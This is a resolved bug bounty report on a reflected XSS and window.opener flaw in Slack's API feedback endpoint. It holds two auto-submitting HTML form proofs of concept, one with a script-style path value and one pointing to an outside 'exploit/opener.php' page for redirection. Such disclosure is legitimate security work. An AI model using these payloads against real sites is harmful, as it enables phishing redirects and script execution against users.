XSS on link and window.opener
Medium
S
Slack
Submitted None
Actions:
Reported by
pisarenko
Vulnerability Details
Technical details and impact analysis
Hi possible xss and error when clicking on the link .
`<form name="pisarenko" action="https://api.slack.com/feedback/submit" method="POST">
<input type='hidden' name='crumb' value="1">
<input type='hidden' name='path' value="blocked:alert()">
<input type='hidden' name='vote' value="Yes">
</form>
<script>document.pisarenko.submit();</script>`
or
`<form name="pisarenko" action="https://api.slack.com/feedback/submit" method="POST">
<input type='hidden' name='crumb' value="1">
<input type='hidden' name='path' value="https://servisvk.com/exploit/opener.php">
<input type='hidden' name='vote' value="Yes">
</form>
<script>document.pisarenko.submit();</script>`
## Impact
Redirection from the original site to an evil site or execution of js code
Please check that the domain is `slack`
{F765317}
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$1000.00
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected